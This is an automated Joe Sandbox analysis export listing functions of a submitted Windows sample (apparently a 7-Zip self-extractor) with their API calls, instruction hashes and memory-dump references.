                                                                                                                                        • Instruction ID: 510514d82056c6b4fcd5a552fda661d2aed45214d42cdecf77f9d3eca8f48bd7
                                                                                                                                        • Opcode Fuzzy Hash: 7565129bc99c0d9bd0404751a75788fc8418b784189d73e03d7ab145d8551701
                                                                                                                                        • Instruction Fuzzy Hash: 0F110876200300ABCB289F16DAC0C9BF7EAAB84350720883FF569D7680C7B9ECD54758
                                                                                                                                        APIs
                                                                                                                                        • _EH_prolog.MSVCRT ref: 00414DD8
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 00414F76
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 00415049
                                                                                                                                          • Part of subcall function 00415346: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0041505A,00000000,00000001), ref: 0041536E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@$H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3431946709-0
                                                                                                                                        • Opcode ID: 04c58f70b3ae3af4a81f86ac04d094f81de620dd4ea7d6dbb38bc93096a2a0a8
                                                                                                                                        • Instruction ID: 05c66da844a657c6192dd0360cb768692f443836589bcaaccfb39479f9247554
                                                                                                                                        • Opcode Fuzzy Hash: 04c58f70b3ae3af4a81f86ac04d094f81de620dd4ea7d6dbb38bc93096a2a0a8
                                                                                                                                        • Instruction Fuzzy Hash: 5AF12871600609DFCB14DF69C884AEE7BB4BF88314F14415AF8199B351DB39ED82CB98
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00402665: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 00402675
                                                                                                                                          • Part of subcall function 00402665: GetProcAddress.KERNEL32(00000000), ref: 0040267C
                                                                                                                                          • Part of subcall function 00402665: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 0040268A
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(0040618A,?,?,?,?,?,?,?,0040618A), ref: 00404117
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,0040618A,?,?,?,?,?,?,?,0040618A), ref: 0040411F
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0040618A,?,?,?,?,?,?,?,0040618A), ref: 00404127
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1642057587-0
                                                                                                                                        • Opcode ID: 8baa72d996272d38ed05c446b7b0ed8a988b778acb04223dc58cbd51a4d46b7c
                                                                                                                                        • Instruction ID: 9e508ec73b50e54c44e6a1cbebbe2d332481b03b5bec8f58460c8bd0d041dc66
                                                                                                                                        • Opcode Fuzzy Hash: 8baa72d996272d38ed05c446b7b0ed8a988b778acb04223dc58cbd51a4d46b7c
                                                                                                                                        • Instruction Fuzzy Hash: 9B515AB2D00109AACF01EFD1CD859FEBB7AAF48308F04442AF611B21D1D7799A4ADB59
                                                                                                                                        APIs
                                                                                                                                        • _EH_prolog.MSVCRT ref: 00415EEF
                                                                                                                                          • Part of subcall function 00418390: _EH_prolog.MSVCRT ref: 00418395
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00415F9F
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00415FDE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1329742358-0
                                                                                                                                        • Opcode ID: 489a3c7cee778f4efcc6a7dc722babe966adbbc4dc412f5c71f799eb8d0ccc08
                                                                                                                                        • Instruction ID: ee2028b182a3def668edec6c1c55fa530388cf6d31d76bb4d9d5585ab1c54ad5
                                                                                                                                        • Opcode Fuzzy Hash: 489a3c7cee778f4efcc6a7dc722babe966adbbc4dc412f5c71f799eb8d0ccc08
                                                                                                                                        • Instruction Fuzzy Hash: 3C414E3160020ADFCB11DFA5C895AEEBBB8EF84304F14446EF406A7251DB79AD86CB15
                                                                                                                                        APIs
                                                                                                                                        • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004029E9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 1890195054-2766056989
                                                                                                                                        • Opcode ID: 59fdda50a6964837229ca20d0fc0b21477a5b75227e6593dad09989c17fceb1e
                                                                                                                                        • Instruction ID: ac6f2177cda35d3747c738f0166e8eeafa9c669c636109ee84ed785ee5894a61
                                                                                                                                        • Opcode Fuzzy Hash: 59fdda50a6964837229ca20d0fc0b21477a5b75227e6593dad09989c17fceb1e
                                                                                                                                        • Instruction Fuzzy Hash: 05F0C8B1B242049ADF71A775DA4DB9E77E4BB04358F10453BD402F61C1EBB8D8448A0D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00416224: _CxxThrowException.MSVCRT(?,0041C8F8), ref: 0041623E
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041C40C,?,?,?,0041BE90), ref: 0041821D
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0041C40C,?,?,?,0041BE90), ref: 00418381
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$ExceptionThrow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2803161813-0
                                                                                                                                        • Opcode ID: e10bf944ff68911ba707479cc8ffbf2420e48e5b65e3bf21be0fe4843cdedc08
                                                                                                                                        • Instruction ID: 83b4708bc2a3ecc906b18b476579f0d6f6f5e7f9de80452c7b562753e21decce
                                                                                                                                        • Opcode Fuzzy Hash: e10bf944ff68911ba707479cc8ffbf2420e48e5b65e3bf21be0fe4843cdedc08
                                                                                                                                        • Instruction Fuzzy Hash: 50815831A00609AFCB24DFA5C891AEEBBF1FF08314F14456EE955A3351DB39A981CB58
                                                                                                                                        APIs
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@??3@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1936579350-0
                                                                                                                                        • Opcode ID: 68d18e978562b686aa57d02b5185ded876e64a512ac0e82d18ed9b6a0d6aac65
                                                                                                                                        • Instruction ID: 4976e3025a107b63499e13e7bd885c103cda5e9e62e117b5f23361b6eed5d2a5
                                                                                                                                        • Opcode Fuzzy Hash: 68d18e978562b686aa57d02b5185ded876e64a512ac0e82d18ed9b6a0d6aac65
                                                                                                                                        • Instruction Fuzzy Hash: 65F08C36210611ABC324DF6DC59186BB3E4FB88351720883FE6DBD72A1DA35A8918754
                                                                                                                                        APIs
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00402B46,00000001,?,00403119,00000000,00000000,00000000), ref: 00402815
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00402B46,00000001,?,00403119,00000000,00000000,00000000), ref: 00402839
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@??3@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1936579350-0
                                                                                                                                        • Opcode ID: 2064f16d128cdefb72a915ff298af5a2bfcd9ac95c91b2f18fb6f0bffc5949de
                                                                                                                                        • Instruction ID: bcdea4c81718d913e52e4f2a3d02f3e10d2d0235028ef0e1c46e76d630642e7e
                                                                                                                                        • Opcode Fuzzy Hash: 2064f16d128cdefb72a915ff298af5a2bfcd9ac95c91b2f18fb6f0bffc5949de
                                                                                                                                        • Instruction Fuzzy Hash: 9AF0903A0046419FC330AF2AC594843FBE8EB59714720CD7FE1D6D36A2C674A880C764
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00412320
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?), ref: 0041232E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                        • Opcode ID: 7ccaebcf3ae4d329a8be65b6a742600eba4963c05187a2ee435572f36bdccfb6
                                                                                                                                        • Instruction ID: 65ff4e97a72b45656fb33b06e3671964329e584f013e41466ec28955d6667f50
                                                                                                                                        • Opcode Fuzzy Hash: 7ccaebcf3ae4d329a8be65b6a742600eba4963c05187a2ee435572f36bdccfb6
                                                                                                                                        • Instruction Fuzzy Hash: B7F0B7B4900208EF8B05CFA4D9448EE7BB5EB49310B208599F815D7350D7759A60DB65
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                        • Opcode ID: b075649f231de9eb948ae6cc86e6b3af4d7c96d89014706d31f654389e5865e8
                                                                                                                                        • Instruction ID: 727f3f96c1ea9d64df56d7fdf8b054f85097dd798dff9fcd5129ed1c701011a3
                                                                                                                                        • Opcode Fuzzy Hash: b075649f231de9eb948ae6cc86e6b3af4d7c96d89014706d31f654389e5865e8
                                                                                                                                        • Instruction Fuzzy Hash: 14E04F366056109FC6249FA2D814D96B3A8EF0972130549AEE8459BA60CB34EC418B84
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004134D2
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 004134F1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                        • Opcode ID: a42822acf305faa6e4e1ed1b7c307282cd490a9ff452566294a691c589accf54
                                                                                                                                        • Instruction ID: b96cbccc89c31bbccc7d9b04d0ab1e0d7f4ede81ffdd75c3392c9c36ee2ff524
                                                                                                                                        • Opcode Fuzzy Hash: a42822acf305faa6e4e1ed1b7c307282cd490a9ff452566294a691c589accf54
                                                                                                                                        • Instruction Fuzzy Hash: 43F0B432200204ABCB218F95CC08ECABBB9EF49761F14441AFA05E7220C775E860DBA4
                                                                                                                                        APIs
                                                                                                                                        • SetFileAttributesW.KERNELBASE(?,?), ref: 004012EF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: e60c0da1a95ea1348e4e355d4ccb5392af3e0846045a7b71aebea512eebea2b4
                                                                                                                                        • Instruction ID: a535b6e06518e329df30477031f310d0f2202fa2471075cd59bb490024d4aebd
                                                                                                                                        • Opcode Fuzzy Hash: e60c0da1a95ea1348e4e355d4ccb5392af3e0846045a7b71aebea512eebea2b4
                                                                                                                                        • Instruction Fuzzy Hash: EDF05E321006029BC7209F55C804BA773F5BB88310F04482EE046F25A0D738A891DF59
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041229A: CloseHandle.KERNELBASE(?,?,00412376,00000000,?,004123BE,?,80000000,?,?,?,004123E0,?,?,00000003,00000080), ref: 004122A5
                                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,004123BE,?,80000000,?,?,?,004123E0), ref: 0041238D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3498533004-0
                                                                                                                                        • Opcode ID: 6a49ffe8ef07d3521491a90d9a8a388089b773908a45dfb32dd5cb480f9273a5
                                                                                                                                        • Instruction ID: 5404b23c39375f3672358c8d8a6143ebe8ef3d7cff4e6c8b62a506d5a933efac
                                                                                                                                        • Opcode Fuzzy Hash: 6a49ffe8ef07d3521491a90d9a8a388089b773908a45dfb32dd5cb480f9273a5
                                                                                                                                        • Instruction Fuzzy Hash: 05E086360003297BCF115F64AD01BCE3F55AF09360F104116FA24961F0C7B2C4B5AB95
                                                                                                                                        APIs
                                                                                                                                        • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00412AE7,00000001,0041EA30,0041EA30,0041A558,?,00405A74,?,?), ref: 004124CF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                        • Opcode ID: 9268ae55d625ba9bd3f65ec717c6ac52065aac6919130e551e4270b037b827da
                                                                                                                                        • Instruction ID: b461439d7febe1c34a09764e505ffeaa1d621892ee7a9e15149591a9498c33bb
                                                                                                                                        • Opcode Fuzzy Hash: 9268ae55d625ba9bd3f65ec717c6ac52065aac6919130e551e4270b037b827da
                                                                                                                                        • Instruction Fuzzy Hash: 21E0C275640208FFDB00DF95D801BDE7BB9AB09354F10C069F9189A260D3799A60DF55
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: c44e62af5a1c4d63caea494e9f2a828a81f46f1dcdedab2345fdd327c4800f2a
                                                                                                                                        • Instruction ID: f5503d52053c13d59ef663bb5271dc3ef65e74f3c8d6ef33482ecfccbeeb62e3
                                                                                                                                        • Opcode Fuzzy Hash: c44e62af5a1c4d63caea494e9f2a828a81f46f1dcdedab2345fdd327c4800f2a
                                                                                                                                        • Instruction Fuzzy Hash: F0E08C72A00108FBDB219F85DC01BEEBB38FB40354F00842FF51151110CB795A509A68
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _beginthreadex
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3014514943-0
                                                                                                                                        • Opcode ID: 5cedbd00d0b58acbd8f2f67b12d806d60a324f9fe697fccd0a4b4518c7bb1b65
                                                                                                                                        • Instruction ID: 07ee00ee9fd24b5c7ccaf45b7f299fd8fb924091db141d3d19c4ab49eb9d3da1
                                                                                                                                        • Opcode Fuzzy Hash: 5cedbd00d0b58acbd8f2f67b12d806d60a324f9fe697fccd0a4b4518c7bb1b65
                                                                                                                                        • Instruction Fuzzy Hash: 69D017F6800208BFCB01DFA0CC05CEA3BADEB08248B008465BD05C2210E632DA108B61
                                                                                                                                        APIs
                                                                                                                                        • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00412407
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: 8938edae947a69c9db44886959f9dc69aa4ca479dc7ae96bb4d07ee1a96cf5e8
                                                                                                                                        • Instruction ID: 9ccc3df45c5337931c1f9920f453614b41e8bb9900b5d069a402b44b4c854426
                                                                                                                                        • Opcode Fuzzy Hash: 8938edae947a69c9db44886959f9dc69aa4ca479dc7ae96bb4d07ee1a96cf5e8
                                                                                                                                        • Instruction Fuzzy Hash: 99E0EC75201208FFDB01CF90CC01FDE7BBDFB49754F208058E90496160C7759A24EB55
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                        • Opcode ID: c430f725063ded926cf1adce3771649bab367042c849bbcb27380caf4cd98197
                                                                                                                                        • Instruction ID: a48faa5ad871c9538198cc58908edd1886e2b5d46e41b8f7632e96d43fd9665f
                                                                                                                                        • Opcode Fuzzy Hash: c430f725063ded926cf1adce3771649bab367042c849bbcb27380caf4cd98197
                                                                                                                                        • Instruction Fuzzy Hash: D7D02231104B22478160BB6AC8004CF73C69F113343008E1EF465836E0C638FDD182DE
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
